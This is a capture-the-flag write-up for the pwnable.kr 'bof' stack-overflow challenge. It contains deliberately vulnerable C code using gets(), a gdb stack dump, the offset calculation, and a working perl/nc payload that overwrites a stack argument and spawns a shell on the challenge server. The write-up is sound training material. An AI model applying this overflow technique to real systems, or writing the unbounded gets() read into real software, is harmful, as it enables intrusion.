#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Deliberately vulnerable CTF target (the pwnable.kr "bof" binary).
 *
 * key: supplied by the caller (main passes 0xdeadbeef). It is compared
 *      against 0xcafebabe to decide whether a shell is spawned. Per the gdb
 *      dump further down the page it lives in the caller's frame at
 *      $ebp+8, i.e. above the saved ebp and the return address.
 *
 * The bug is the gets() call: gets() has no length argument and reads until
 * newline/EOF, so more than 32 bytes of input run past overflowme into the
 * saved ebp, the return address and finally key. The fix would be
 * fgets(overflowme, sizeof overflowme, stdin); it is left untouched here
 * because the overflow is the point of the exercise. Note also that
 * system("/bin/sh") is reached from a branch that an attacker controls.
 */
void func(int key){
char overflowme[32]; // 32-byte stack buffer; the dump shows it starting at $ebp-0x2c, 52 bytes below key
printf("overflow me : ");
gets(overflowme); // smash me! -- unbounded read (gets() was removed in C11); this is the overflow
if(key == 0xcafebabe){
system("/bin/sh"); // only reachable once the overflow has rewritten key with 0xcafebabe
}
else{
printf("Nah..\n");
}
}
/*
 * Entry point: calls func() with a key that is deliberately not 0xcafebabe,
 * so the shell branch is only reachable by overwriting key on the stack.
 * argc/argv are accepted but unused.
 */
int main(int argc, char* argv[]){
(void)argc;
(void)argv;
const int seed_key = 0xdeadbeef;
func(seed_key);
return 0;
}
(gdb) x/20x $ebp-0x2c
0xbffff63c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff64c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff65c: 0x41414141 0x80004141 0x80000530 0xbffff688
0xbffff66c: 0x8000069f 0xdeadbeef 0xb7fff000 0x800006b9
0xbffff67c: 0xb7fc0000 0x800006b0 0x00000000 0x00000000
Reading the dump: x/20x $ebp-0x2c starts at 0xbffff63c, so $ebp = 0xbffff668 (it holds the saved ebp 0xbffff688), the return address 0x8000069f is at $ebp+4 = 0xbffff66c, and the key argument 0xdeadbeef sits at $ebp+8 = 0xbffff670. The 0x41 bytes of the test input begin at $ebp-0x2c, so overflowme is 0x2c + 8 = 52 bytes below key. The payload is therefore 52 bytes of padding followed by 0xcafebabe in little-endian byte order (\xbe\xba\xfe\xca). The padding also clobbers the saved ebp and the return address, which does not matter as long as system("/bin/sh") runs before func() returns.
# Payload: 52 bytes of 'A' padding, then 0xcafebabe little-endian, then a newline so gets() stops reading.
# The trailing `cat` keeps the pipe to nc open after perl exits, so the commands typed next (ls, cat flag) reach the spawned /bin/sh.
root@ubuntu:/home/expointer# (perl -e 'print "A"x52, "\xbe\xba\xfe\xca\n"';cat) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
super.pl
cat flag